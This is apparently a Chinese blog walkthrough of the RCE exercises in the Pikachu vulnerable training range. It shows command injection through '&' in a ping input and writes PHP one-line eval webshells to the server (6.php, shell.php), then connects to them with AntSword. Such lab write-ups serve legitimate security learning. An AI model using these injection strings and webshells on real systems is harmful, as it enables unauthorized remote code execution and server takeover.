Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
RH23121113 小时前
2026.4.16Linux 管道
java·linux·服务器
handler0114 小时前
Linux: 基本指令知识点(2)
linux·服务器·c语言·c++·笔记·学习
Web极客码14 小时前
深入了解WordPress网站访客意图
服务器·前端·wordpress
KKKlucifer14 小时前
国内堡垒机如何打通云网运维安全一体化
运维·安全
橙子也要努力变强14 小时前
Linux信号机制
linux·服务器·网络
FreeCultureBoy14 小时前
GDidees CMS - Arbitrary File Upload (CVE-2023-27178)
安全
wydd99_lll14 小时前
docker特权模式下逃逸
运维·docker·容器
程序猿编码15 小时前
给你的网络流量穿件“隐形衣“:手把手教你用对称加密打造透明安全隧道
linux·开发语言·网络·安全·linux内核
pengyi87101515 小时前
私网IP映射公网基础原理,搭配代理IP远程访问入门
linux·服务器·网络
mseaspring15 小时前
一款用于监控跨多台主机 Docker 容器的实时终端
运维·docker·容器
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026年4月AI大事件深度解读:大模型竞争进入“深水区“042026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free05近期有什么ai的新消息,新动态? 2026.4月06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07Claude Code Windows 兼容性问题:指定版本 2.1.112 可解决08从限购到畅通:GLM-5.1 Coding Plan接入攻略09UBUNTU Claude Code 报错 claude native binary not installed10免费!不限量!用opencode接入英伟达(NVIDIA)大模型,轻松打造你的 AI 编程助手